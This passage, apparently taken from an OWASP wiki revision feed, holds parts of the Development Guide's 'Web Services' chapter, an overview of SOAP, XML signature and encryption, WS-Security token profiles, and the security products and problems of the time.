Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59468</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59468"/>
				<updated>2009-04-26T11:55:29Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Types of tokens */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
